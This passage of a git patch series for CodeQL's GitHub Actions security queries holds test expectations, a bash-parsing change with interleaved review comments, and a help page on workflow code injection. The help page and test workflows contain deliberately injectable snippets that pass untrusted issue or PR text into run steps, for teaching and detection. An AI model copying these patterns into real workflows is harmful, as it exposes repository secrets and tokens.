.github/workflows/multiline2.yml@32:13:32:39 | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | .github/workflows/multiline2.yml:34:9:40:6 | .github/workflows/multiline2.yml@34:9:40:6 | +| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:35:14:39:14 | .github/workflows/multiline2.yml@35:14:39:14 | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | .github/workflows/multiline2.yml:40:9:46:6 | .github/workflows/multiline2.yml@40:9:46:6 | +| .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:41:14:45:14 | 
.github/workflows/multiline2.yml@41:14:45:14 | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | .github/workflows/multiline2.yml:46:9:52:6 | .github/workflows/multiline2.yml@46:9:52:6 | +| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:47:14:51:14 | .github/workflows/multiline2.yml@47:14:51:14 | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | .github/workflows/multiline2.yml:52:9:58:6 | .github/workflows/multiline2.yml@52:9:58:6 | +| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline2.yml:53:14:57:14 | .github/workflows/multiline2.yml@53:14:57:14 | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | .github/workflows/multiline2.yml:58:9:63:6 | .github/workflows/multiline2.yml@58:9:63:6 | +| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline2.yml:59:14:62:14 | .github/workflows/multiline2.yml@59:14:62:14 | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | .github/workflows/multiline2.yml:63:9:66:6 | .github/workflows/multiline2.yml@63:9:66:6 | +| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | .github/workflows/multiline2.yml:64:14:65:142 | .github/workflows/multiline2.yml@64:14:65:142 | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | .github/workflows/multiline2.yml:66:9:71:6 | .github/workflows/multiline2.yml@66:9:71:6 | +| .github/workflows/multiline2.yml:67:14:70:42 | echo "PR_TITLE<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:11:14:14:48 | .github/workflows/multiline.yml@11:14:14:48 | 
@@ -1042,6 +1304,7 @@ nodeLocations | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:20:40:53 | .github/workflows/test.yml@40:20:40:53 | scopes | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/multiline2.yml:1:1:89:35 | on: | | .github/workflows/multiline.yml:1:1:89:29 | on: | | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | | .github/workflows/test.yml:1:1:40:53 | on: push | @@ -1221,8 +1484,6 @@ writeToGitHubEnv | VAR1 | $TITLE | VAR1<> $GITHUB_ENV) | VAR3<> $GITHUB_ENV)\nEOF | -| VAR4 | ${ISSUE_BODY1} | VAR4=${ISSUE_BODY1} | -| VAR5 | Hello\nWorld | VAR5< Date: Thu, 1 Aug 2024 17:49:13 +0200 Subject: [PATCH 0445/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- .../Security/CWE-094/CodeInjectionCritical.md | 60 +++++++++++++++++++ .../Security/CWE-094/CodeInjectionMedium.md | 60 +++++++++++++++++++ ql/src/qlpack.yml | 2 +- 4 files changed, 122 insertions(+), 2 deletions(-) create mode 100644 ql/src/Security/CWE-094/CodeInjectionCritical.md create mode 100644 ql/src/Security/CWE-094/CodeInjectionMedium.md diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index dff01f80f2b..3a09bb01674 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.29 +version: 0.1.30 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/Security/CWE-094/CodeInjectionCritical.md b/ql/src/Security/CWE-094/CodeInjectionCritical.md new file mode 100644 index 00000000000..9939c88eb19 --- /dev/null +++ b/ql/src/Security/CWE-094/CodeInjectionCritical.md 
@@ -0,0 +1,60 @@ +# Code Injection in GitHub Actions + +Using user-controlled input in GitHub Actions may lead to code injection in contexts like _run:_ or _script:_. + +Code injection in GitHub Actions may allow an attacker to exfiltrate any secrets used in the workflow and the temporary GitHub repository authorization token. The token might have write access to the repository, allowing an attacker to use the token to make changes to the repository. + +## Recommendation + +The best practice to avoid code injection vulnerabilities in GitHub workflows is to set the untrusted input value of the expression to an intermediate environment variable and then use the environment variable using the native syntax of the shell/script interpreter (that is, not _${{ env.VAR }}_). + +It is also recommended to limit the permissions of any tokens used by a workflow such as the GITHUB_TOKEN. + +## Example + +The following example lets a user inject an arbitrary shell command: + +```yaml +on: issue_comment + +jobs: + echo-body: + runs-on: ubuntu-latest + steps: + - run: | + echo '${{ github.event.comment.body }}' +``` + +The following example uses an environment variable, but **still allows the injection** because of the use of expression syntax: + +```yaml +on: issue_comment + +jobs: + echo-body: + runs-on: ubuntu-latest + steps: + - env: + BODY: ${{ github.event.issue.body }} + run: | + echo '${{ env.BODY }}' +``` + +The following example uses shell syntax to read the environment variable and will prevent the attack: + +```yaml +jobs: + echo-body: + runs-on: ubuntu-latest + steps: + - env: + BODY: ${{ github.event.issue.body }} + run: | + echo "$BODY" +``` + +## References + +- GitHub Security Lab Research: [Keeping your GitHub Actions and workflows secure: Untrusted input](https://securitylab.github.com/research/github-actions-untrusted-input). 
+- GitHub Docs: [Security hardening for GitHub Actions](https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions). +- GitHub Docs: [Permissions for the GITHUB_TOKEN](https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token). diff --git a/ql/src/Security/CWE-094/CodeInjectionMedium.md b/ql/src/Security/CWE-094/CodeInjectionMedium.md new file mode 100644 index 00000000000..9939c88eb19 --- /dev/null +++ b/ql/src/Security/CWE-094/CodeInjectionMedium.md 
@@ -0,0 +1,60 @@ +# Code Injection in GitHub Actions + +Using user-controlled input in GitHub Actions may lead to code injection in contexts like _run:_ or _script:_. + +Code injection in GitHub Actions may allow an attacker to exfiltrate any secrets used in the workflow and the temporary GitHub repository authorization token. The token might have write access to the repository, allowing an attacker to use the token to make changes to the repository. + +## Recommendation + +The best practice to avoid code injection vulnerabilities in GitHub workflows is to set the untrusted input value of the expression to an intermediate environment variable and then use the environment variable using the native syntax of the shell/script interpreter (that is, not _${{ env.VAR }}_). + +It is also recommended to limit the permissions of any tokens used by a workflow such as the GITHUB_TOKEN. + +## Example + +The following example lets a user inject an arbitrary shell command: + +```yaml +on: issue_comment + +jobs: + echo-body: + runs-on: ubuntu-latest + steps: + - run: | + echo '${{ github.event.comment.body }}' +``` + +The following example uses an environment variable, but **still allows the injection** because of the use of expression syntax: + +```yaml +on: issue_comment + +jobs: + echo-body: + runs-on: ubuntu-latest + steps: + - env: + BODY: ${{ github.event.issue.body }} + run: | + echo '${{ env.BODY }}' +``` + +The following example uses shell syntax to read the environment variable and will prevent the attack: + +```yaml +jobs: + echo-body: + runs-on: ubuntu-latest + steps: + - env: + BODY: ${{ github.event.issue.body }} + run: | + echo "$BODY" +``` + +## References + +- GitHub Security Lab Research: [Keeping your GitHub Actions and workflows secure: Untrusted input](https://securitylab.github.com/research/github-actions-untrusted-input). 
+- GitHub Docs: [Security hardening for GitHub Actions](https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions). +- GitHub Docs: [Permissions for the GITHUB_TOKEN](https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token). diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 1070a8e9a97..b89b197da04 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.29 +version: 0.1.30 groups: [actions, queries] suites: codeql-suites extractor: javascript From 41fade5feb30339cf8d453e7eb1cc0b1c7c57e7b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 2 Aug 2024 12:44:43 +0200 Subject: [PATCH 0446/1267] feat(bash): Improve bash command parsing --- ql/lib/codeql/actions/ast/internal/Ast.qll | 2 +- ql/lib/codeql/actions/config/Config.qll | 2 +- .../.github/workflows/poisonable_steps.yml | 5 + .../library-tests/poisonable_steps.expected | 2 +- ql/test/library-tests/test.expected | 254 ++++++++++-------- .../.github/workflows/arg_injection.yml | 12 +- .../ArgumentInjectionCritical.expected | 8 + .../CWE-094/ArgumentInjectionMedium.expected | 5 + 8 files changed, 167 insertions(+), 123 deletions(-) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index e05e3a8c41c..5bb94ba8a68 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -1243,7 +1243,7 @@ class RunImpl extends StepImpl { RunImpl() { this.getNode().lookup("run") = script } - string getScript() { result = script.getValue() } + string getScript() { result = script.getValue().regexpReplaceAll("\\\\\\s*\n", "") } ScalarValueImpl getScriptScalar() { result = TScalarValueNode(script) } diff --git a/ql/lib/codeql/actions/config/Config.qll b/ql/lib/codeql/actions/config/Config.qll index fb1ae9af14d..e298865c468 100644 
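Review bot: In `getScript()` the pattern `"\\\\\\s*\n"` lets `\s*` consume newlines as well, so a trailing backslash followed by an empty line joins the command with whatever comes after the blank line, which the shell would run as a separate command. Limiting the gap to horizontal whitespace avoids that: `result = script.getValue().regexpReplaceAll("\\\\[ \\t]*\n", "")`. The replacement is applied whatever shell the step declares and also inside quoted text, and the returned string no longer lines up with the scalar from `getScriptScalar()`, so a doc comment such as `/** Gets the script with backslash-newline continuations joined; offsets differ from the YAML scalar. */` would help callers. `RunImpl` starts and ends outside the hunk.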
--- a/ql/lib/codeql/actions/config/Config.qll +++ b/ql/lib/codeql/actions/config/Config.qll @@ -92,7 +92,7 @@ predicate argumentInjectionSinksDataModel(string regexp, int command_group, int exists(string sub_regexp | Extensions::argumentInjectionSinksDataModel(sub_regexp, command_group, argument_group) and // capture regexp - regexp = ".*" + commandPrefixDelimiter() + sub_regexp + commandSuffixDelimiter() + ".*" + regexp = ".*" + commandPrefixDelimiter() + sub_regexp // + commandSuffixDelimiter() + ".*" ) } diff --git a/ql/test/library-tests/.github/workflows/poisonable_steps.yml b/ql/test/library-tests/.github/workflows/poisonable_steps.yml index fad7001ad5a..2e971baa050 100644 --- a/ql/test/library-tests/.github/workflows/poisonable_steps.yml +++ b/ql/test/library-tests/.github/workflows/poisonable_steps.yml @@ -39,3 +39,8 @@ jobs: - run: echo "foo" | awk -f ./config.awk > foo.txt - run: gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo - run: ./foo/cmd + - run: | + sed -e 's##TITLE#' \ + -e 's##${{ env.sot_repo }}#' \ + -e 's##${TITLE}#' \ + .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky diff --git a/ql/test/library-tests/poisonable_steps.expected b/ql/test/library-tests/poisonable_steps.expected index b164d16b603..0cd71f96ea9 100644 --- a/ql/test/library-tests/poisonable_steps.expected +++ b/ql/test/library-tests/poisonable_steps.expected @@ -30,4 +30,4 @@ | .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | | .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | | .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | -| .github/workflows/poisonable_steps.yml:41:9:41:23 | Run Step | +| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index dfdd843d8a3..6bedcadcdba 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected 
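Review bot: In `argumentInjectionSinksDataModel` the suffix is disabled by commenting it out mid-expression (`sub_regexp // + commandSuffixDelimiter() + ".*"`), which leaves dead code on the line and a `// capture regexp` comment that no longer describes the pattern's shape. If the call site uses whole-string matching (it is outside the hunk), every `sub_regexp` supplied by the data model must now consume the rest of the script itself. I would delete the commented-out tail and say so explicitly, e.g. `// no suffix delimiter: sub_regexp must match through the end of the script`. It is also worth checking whether `commandSuffixDelimiter()` still has any other caller.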
@@ -8,7 +8,7 @@ workflows | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | .github/workflows/multiline2.yml:1:1:89:35 | on: | | .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | | .github/workflows/test.yml:1:1:40:53 | on: push | reusableWorkflows compositeActions @@ -16,14 +16,14 @@ jobs | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | localJobs | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | extJobs @@ -94,7 +94,8 @@ steps | .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | | .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | | .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | -| .github/workflows/poisonable_steps.yml:41:9:41:23 | Run Step | +| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | | .github/workflows/test.yml:11:9:15:6 | Uses Step | | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | 
@@ -167,7 +168,8 @@ runSteps | .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | sed -f config file.txt > foo.txt | | .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | echo "foo" \| awk -f ./config.awk > foo.txt | | .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | -| .github/workflows/poisonable_steps.yml:41:9:41:23 | Run Step | ./foo/cmd | +| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | ./foo/cmd | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | sed -e 's##TITLE#' -e 's##${{ env.sot_repo }}#' -e 's##${TITLE}#' .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | ${{ github.event.pull_request.head.ref }} | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | echo ${{needs.job1.outputs.job_output}} | 
@@ -185,6 +187,7 @@ runExprs | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | | .github/workflows/multiline2.yml:30:9:34:6 | Run Step | .github/workflows/multiline2.yml:32:13:32:39 | toJson(github.event) | | .github/workflows/multiline.yml:30:9:34:6 | Run Step | .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | .github/workflows/poisonable_steps.yml:44:32:44:50 | env.sot_repo | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | 
@@ -287,7 +290,8 @@ runStepChildren | .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | | .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | | .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | -| .github/workflows/poisonable_steps.yml:41:9:41:23 | Run Step | .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | +| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:13:28:23 | simplesink2 | 
@@ -542,142 +546,147 @@ parentNodes | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:89:29 | on: | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:85:9:89:29 | Run Step | -| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | -| .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| 
.github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | -| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | 
.github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | -| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | | .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | -| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:13:14:13:32 | . 
venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | -| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . 
venv/bin/activate | .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | -| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | -| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. 
venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | -| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | -| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | 